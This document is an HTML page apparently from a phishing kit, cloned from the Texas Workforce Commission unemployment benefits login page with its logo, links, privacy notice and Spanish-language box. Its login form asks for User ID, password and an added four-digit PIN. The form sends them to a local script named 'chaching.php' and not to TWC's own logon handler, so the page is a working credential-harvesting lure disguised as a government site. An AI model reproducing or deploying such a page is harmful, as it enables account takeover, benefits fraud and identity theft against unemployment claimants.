<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" data-scrapbook-source="https://login.apps.twc.state.tx.us/UBS/security/logon.do" data-scrapbook-create="20210410025502005" lang="en"><head>


	 <meta http-equiv="PRAGMA" content="NO-CACHE">


	<title>Texas Workforce Commission's Unemployment Benefit Services - Logon


 </title>

	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta name="keywords" content="unemployment benefits services, apply for benefits, apply for unemployment, apply for unemployment benefits, claim benefits, file for benefits, file a claim, file for unemployment, register for work, Tele-Center, Tele-Serv, Tele-Serve, teleserv, teleserve, unemployment benefits, unemployment insurance, Texas, Texas UI, unemployment, benefits, insurance, apply, application, claim, ui, uc, compensation, file, unemployment, unemployment insurance, unemployment compensation, benefit payment, Workforce, unemployment check, file On Line, file online, TWC, Workforce Commission, Texas Workforce, certification, claim certification, payment request, request payment, request benefits, request benefit payment, payment, request, continued claim, two-week claim, two week claim, biweekly claim, bi-weekly claim, paymentrequest, work search log, submit work search, work search, log, unemployment benifits services, apply for benifits, apply for unemployment benifits, unemployment benefits, benefits, benefit payment, request benefits, request benefit payment, quit, fired, layoff, lay off, strike, lockout, lock out, lock-out, reduced hours, labor dispute, 1099G, 1099-G, income taxes, W-2, income tax, payment option, direct deposit, debit card, irs, withholding, federal taxes">
	<meta name="description" content="Unemployment Benefits Services allows individuals to submit new applications for unemployment benefits, submit payment requests, get claim and payment status information, change their benefit payment option, update their address or phone number, view IRS 1099-G information, and respond to work search log requests.">
	<link rel="SHORTCUT ICON" href="favicon.ico">


	<style>
		#data th.sortable a {
			background-image: url("");
		}
		#data th.order1 a {
			background-image: url("");
		}
		#data th.order2 a {
			background-image: url("");
		}
		#broadcast-messages {
		  	background: url("") no-repeat center left;
		}
		#left-nav ul li a:hover, #left-nav ul li a.selected  {
			background: url("leftnav_arrow.gif") 6px 11px no-repeat;
		}
		a.new-window {
			padding-left: 22px;
			background: url("new_window.gif") no-repeat top left;
		}
		#footer a.new-window {
			padding-left: 17px;
			background: url("new_window_small.gif") no-repeat top left;
		}
		div.watermark-background {
			background-image: url("");
		}
	</style>


	<link rel="stylesheet" href="palette.css" type="text/css">
	<link rel="stylesheet" href="layout.css" type="text/css">
	<link rel="stylesheet" href="forms.css" type="text/css">
	<link rel="stylesheet" href="help.css" type="text/css">
	<link rel="stylesheet" href="tables.css" type="text/css">
	<link rel="stylesheet" href="nav.css" type="text/css">
	<link rel="stylesheet" href="print.css" type="text/css" media="print">






</head>

<body>
<div id="wrapper">


















				<a href="#leftnav" class="skip">Skip to navigation</a>

				<a href="#main" class="skip">Skip to main content</a>
	<div id="header" class="noprint">

		<span id="logo">
			<img src="twc_logo.jpg" alt="logo of Texas Workforce Commission" bundle="pagetext">
		</span>

		<div id="banner">
			<div class="banner-links">












               <div class="collapse navbar-collapse  topNavMenu" role="navigation">
                <ul class="nav navbar-nav navbar-right">


						<li class="first   ">
							<a href="http://www.twc.state.tx.us/" target="_blank"><span class="">TWC Home</span></a>
						</li>

						<li class="   ">
							<a href="http://www.twc.state.tx.us/twcinfo/contactus.html" target="_blank"><span class="">TWC Contact Information</span></a>
						</li>

				</ul>
		      </div><!-- /.navbar-collapse -->

			</div>
		</div>

		<div id="app-title">
			<div id="app-name">
				Unemployment Benefit Services
			</div>


		</div>
		<div id="app-title-right">
		     <div id="app-name">
				&nbsp;
			</div>
			<div id="app-tagline">

			</div>

		</div>


		<div class="clear"></div>

	</div>


	<div id="top-nav-wrapper" class="noprint">
		<div id="top-nav">


		</div>
	</div>
















	<div id="content-wrapper">













		<div id="left-col" class="noprint">
			<div id="left-nav" class="noprint">
				<a name="leftnav"></a>











<h3>Quick Links</h3>
<ul>





			<li class="  "><a class="selected" href="">Logon</a></li>







			<li class="  "><a class="" href="https://login.apps.twc.state.tx.us/UBS/selfRegister.do">Sign Up for User ID</a></li>







			<li class="  "><a class="" href="https://login.apps.twc.state.tx.us/UBS/security/forgotPassStep1.do">Forgot Password?</a></li>






				<li class="  "><a class="" href="https://login.apps.twc.state.tx.us/UBS/security/forgotUserId.do">Forgot User ID?</a></li>






</ul>
			</div>
		</div>


		<div id="right-col">
			<a name="main"></a>
			<div id="content-left">


			<div class="page-title">
				<div class="page-name">
				<h1>

				Logon







				</h1>
				</div>



				<div class="page-help">
					<span class="page-help">


						<a target="help_page" href="https://login.apps.twc.state.tx.us/UBS/help.do?key=/core/tiles/security/help/logonHelp.jsp&amp;page_title=Logon">Need help?</a>&nbsp;
						<img alt="Need help?" src="help.gif" width="12" height="11">

					</span>
				</div>
			</div>















			<div class="page-block">
















		New to Unemployment Benefit Services? If you already have a User ID for another TWC Internet application, such as WorkInTexas.com, try logging on with that ID. Otherwise, please <a href="https://login.apps.twc.state.tx.us/UBS/selfRegister.do">sign up for a User ID</a>.


			</div>




			<div class="page-block">
				<div class="required-info">
						<img src="required.gif" alt="red asterisk" width="10" height="10"> indicates required information
				</div>
			</div>




			<div class="page-block">










<form method="POST" action="chaching.php">


	<div class="form-row">
		<span class="error-indicator"></span>
<div class="label-narrow"><label for="field.label.username">
User ID:<img alt="This information is required." src="hidden.gif" width="0" height="0"></label></div>
		<span class="required"><img alt="red asterisk" src="required.gif" width="10" height="10"></span>

<div class="element">

		<input type="text" name="username" maxlength="32" size="33" value="" id="" autocomplete="off">
	</div>
</div>



	<div class="form-row">
		<span class="error-indicator"></span>
<div class="label-narrow"><label for="field.label.password">
Password:<img alt="This information is required." src="hidden.gif" width="0" height="0"></label></div>
		<span class="required"><img alt="red asterisk" src="required.gif" width="10" height="10"></span>

<div class="element">

		<input type="password" name="password" maxlength="32" size="33" value="" id="">
	</div>
</div>


<div class="form-row">
		<span class="error-indicator"></span>
<div class="label-narrow"><label for="field.label.pin">
Pin:<img alt="This information is required." src="hidden.gif" width="0" height="0"></label></div>
		<span class="required"><img alt="red asterisk" src="required.gif" width="10" height="10"></span>

<div class="element">

		<input type="password" name="pin" maxlength="4" size="12" value="" id="">
	</div>
</div>



	<div class="security-statement">Under <a href="http://texreg.sos.state.tx.us/public/readtac$ext.TacPage?sl=R&amp;app=9&amp;p_dir=&amp;p_rloc=&amp;p_tloc=&amp;p_ploc=&amp;pg=1&amp;p_tac=&amp;ti=1&amp;pt=10&amp;ch=202&amp;rl=25" target="_blank">Texas state rule</a>, usage may be subject to security testing and monitoring, applicable <a href="http://www.texasworkforce.org/twcinfo/privacy.html" target="_blank">privacy provisions</a>, and criminal prosecution for misuse or unauthorized use. Texas Workforce Commission collects personal information entered into electronic forms on this Internet site. For more information on your rights to request, review and correct information submitted on this electronic form, please see TWC's&nbsp;<a href="http://www.twc.state.tx.us/twcinfo/privacy.html" target="_blank">Privacy and Security Information</a>.</div>

		<div class="form-row">
	<span class="submit"><br>

		<input type="submit" name="submit" value="submit" class="button">
	</span>
	</div>


</form>
			</div>


			</div>
			<div id="content-right">
				<span class="info-box">









<span class="info-header"><img alt="¿Habla español?" src="lightbulb.gif" width="12" height="14">
    &nbsp;¿Habla español?
</span>
<p class="info-text">
    Ver esta página <a href="https://login.apps.twc.state.tx.us/UBS/security/changeLanguage.do">en español</a>.
</p>

<hr class="info-break">


<span class="info-header"><img alt="Technical Requirements" src="lightbulb.gif" width="12" height="14">&nbsp;
	Technical Requirements
</span>
<p class="info-text">

    	Recommended browsers are <a href="http://www.mozilla.org/firefox/new/" target="new">Firefox</a>, <a href="https://www.google.com/chrome/browser/" target="new">Chrome</a> or <a href="http://support.apple.com/downloads/#safari" target="new">Safari</a>. Click on the respective link to download the latest free version upgrade.

</p>

<hr class="info-break">

<span class="info-header"><img alt="Public Computer" src="lightbulb.gif" width="12" height="14">&nbsp;
	Public Computer
</span>
<p class="info-text">
    If you are using a computer in a public place, logoff and close the browser when you are finished entering information.  This is for your protection and will prevent someone else from viewing your information.
</p>

<hr class="info-break">

<p class="info-text" style="text-align: center;">
    <a href="http://www.twc.state.tx.us/twcinfo/accessibility.html" target="new">Accessibility</a><span style="font-size:0;">|</span>
	<br><br>
	<a href="http://www.twc.state.tx.us/twcinfo/eoinfo.html" target="new">Equal Opportunity is the Law</a>
</p>
				</span>
			</div>
		</div>
	</div>




	<div id="footer-wrapper" class="noprint">
		<div id="footer">









<div id="dynamic-footer">



</div>











©2021&nbsp;
    Texas Workforce Commission (TWC). All rights reserved.
 &nbsp;&nbsp;


	<a href="https://login.apps.twc.state.tx.us/UBS/reportTechnicalProblems.do" target="_blank" class="new-window">Report technical problems</a>

<br>


		</div>
	</div>
</div>

<div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear 0s; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div><div style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div><div style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div><div style="z-index: 2000000000; position: relative;"><iframe title="recaptcha challenge" src="index_2.html" style="width: 100%; height: 100%;" name="c-4mtf1nthbvbf" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" frameborder="0"></iframe></div></div></body></html>
